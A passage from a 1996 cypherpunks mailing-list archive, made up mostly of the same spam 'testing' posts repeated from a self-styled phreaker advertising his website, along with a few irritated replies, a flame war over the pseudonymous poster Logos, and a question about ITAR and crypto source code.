Thanks and enjoy the holidays.

Sincerely,
Ken Williams




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Tue, 3 Dec 1996 15:23:00 -0800 (PST)
To: scholars.bellevue.edu@ns.ccsn.edu (Phiberelic Phreaker)
Subject: Re: testing
In-Reply-To: <194505C019D@scholars.bellevue.edu>
Message-ID: <199612032234.OAA13958@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Phiberelic Phreaker writes:
> 
>         PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
> eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
> rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
> bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
>        PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html


Evidently "PhReAkInG" causes uncontrollable ourbursts of CaPiTaLiZaTiOn due
to horrible shift-key spasms...


>        PhIbErDeLiC PhReAkEr

You probably want alt.2600, it'll be more your style.
BTW, you've posted the same fucking message 4 times now.
Plonk.


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 12:51:05 -0800 (PST)
To: cypherpunks@toad.com
Subject: testing
Message-ID: <194088121E9@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 3 Dec 1996 13:34:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Logos here
In-Reply-To: <Pine.BSF.3.91.961202220347.2616A-100000@blacklodge.c2.net>
Message-ID: <sgmDyD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


LOGOS <logos@c2.net> writes:

> Sovereign collegues,

You already sound like a jerk.

>      I am Logos. I have adopted this pseudonym to conceal my
> 'true name'. I want the ideas which I shall be espousing
> to stand or fall on their own merits and not on the basis
> of biases that my name, sex, ethnicity, etc. might otherwise

sexual preferences...

> elicit. I hope my contributions to this list will be seen as
> positive by most list members.

Well, I'm not a list member.

> treat Tim May and Dimitry Vilus with similar respect and
> courtesy.  What is at stake is far more important than egos.
> Cypherpunks defeated Clipper, but of late they have only
> defeated themselves.

That's right. You lack the decorum to spell either my first name or
my last name correctly. "Cypher punks" are a gang of uncouth juveniles

What logic? "Cypher punks" such as Paul Bradley are incapable of
discussing a technical topic (such as Don Wood's IPG proposal) without
putting "(spit)" after Don's name and calling his algorithm "bullshit".
That's from the same person who first ranted about "brute force attacks on
one-time pads", then attributed to me various shit I never said.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wolf <dlchris@minot.ndak.net>
Date: Tue, 3 Dec 1996 12:53:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: Cool site
In-Reply-To: <c=US%a=_%p=Inference%l=LANDRU-961203145204Z-12520@landru.novato.inference2.com>
Message-ID: <32A4A194.1F1@minot.ndak.net>
MIME-Version: 1.0
Content-Type: text/plain


Go here http://members.tripod.com/~wolf16




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 3 Dec 1996 13:31:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: ANNOUNCEMENT: New low-noise cryptography mailing list
In-Reply-To: <199612030316.WAA04403@jekyll.piermont.com>
Message-ID: <PTmDyD5w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Meta-question: if someone posts strong crypto source code to the
moderated mailing list, can the moderator(s) be prosecuted under ITAR?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:05:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: testing
Message-ID: <194471E623C@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:07:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: testing new Home Web site
Message-ID: <19447242C13@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


try this site and tell me how you like it
if you dont like it then message Mr.Angry on that page
        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:07:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: testing
Message-ID: <194505C019D@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:09:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: testing new Home Web site
Message-ID: <194505E06E2@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


try this site and tell me how you like it
if you dont like it then message Mr.Angry on that page
        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:08:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: testing new Home Web site
Message-ID: <19450661BF7@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


try this site and tell me how you like it
if you dont like it then message Mr.Angry on that page
        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:13:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: testing
Message-ID: <194579F7D64@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:09:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: testing new Home Web site
Message-ID: <19457A07DE1@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


try this site and tell me how you like it
if you dont like it then message Mr.Angry on that page
        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:10:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: testing new Home Web site
Message-ID: <19457A42C4C@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


try this site and tell me how you like it
if you dont like it then message Mr.Angry on that page
        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:14:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: test new web site
Message-ID: <19457A40056@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


look at my page and tell me how you like it
if you dont like it please tell Mr.Angry , just click on the un happy 
face on that page for a quicker reply
        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:13:54 -0800 (PST)
To: cypherpunks@toad.com
Subject: testing
Message-ID: <1945DA0704E@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:11:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: testing new Home Web site
Message-ID: <1945DA23E8D@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


try this site and tell me how you like it
if you dont like it then message Mr.Angry on that page
        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:13:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: testing new Home Web site
Message-ID: <1945DA17149@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


try this site and tell me how you like it
if you dont like it then message Mr.Angry on that page
        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:11:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: test new web site
Message-ID: <1945DA3597E@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


look at my page and tell me how you like it
if you dont like it please tell Mr.Angry , just click on the un happy 
face on that page for a quicker reply
        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:12:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: testing
Message-ID: <1945EA87276@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:12:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: testing new Home Web site
Message-ID: <1945EA972F4@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


try this site and tell me how you like it
if you dont like it then message Mr.Angry on that page
        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:14:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: testing new Home Web site
Message-ID: <1945EAC763D@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


try this site and tell me how you like it
if you dont like it then message Mr.Angry on that page
        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:11:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: test new web site
Message-ID: <1945EAD746D@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


look at my page and tell me how you like it
if you dont like it please tell Mr.Angry , just click on the un happy 
face on that page for a quicker reply
        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:12:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: testing new Home Web site
Message-ID: <194605042B7@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


try this site and tell me how you like it
if you dont like it then message Mr.Angry on that page
        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:11:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: testing
Message-ID: <194604F4239@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:12:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: test new web site
Message-ID: <19460561CED@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


look at my page and tell me how you like it
if you dont like it please tell Mr.Angry , just click on the un happy 
face on that page for a quicker reply
        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:13:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: testing new Home Web site
Message-ID: <194605110EA@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


try this site and tell me how you like it
if you dont like it then message Mr.Angry on that page
        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:12:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: testing
Message-ID: <194613F379C@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:11:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: testing new Home Web site
Message-ID: <1946140381A@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


try this site and tell me how you like it
if you dont like it then message Mr.Angry on that page
        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:13:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: test new web site
Message-ID: <19461473B8A@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


look at my page and tell me how you like it
if you dont like it please tell Mr.Angry , just click on the un happy 
face on that page for a quicker reply
        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:15:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: testing new Home Web site
Message-ID: <19461463B0C@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


try this site and tell me how you like it
if you dont like it then message Mr.Angry on that page
        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:12:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: testing
Message-ID: <19461895C72@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:15:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: testing new Home Web site
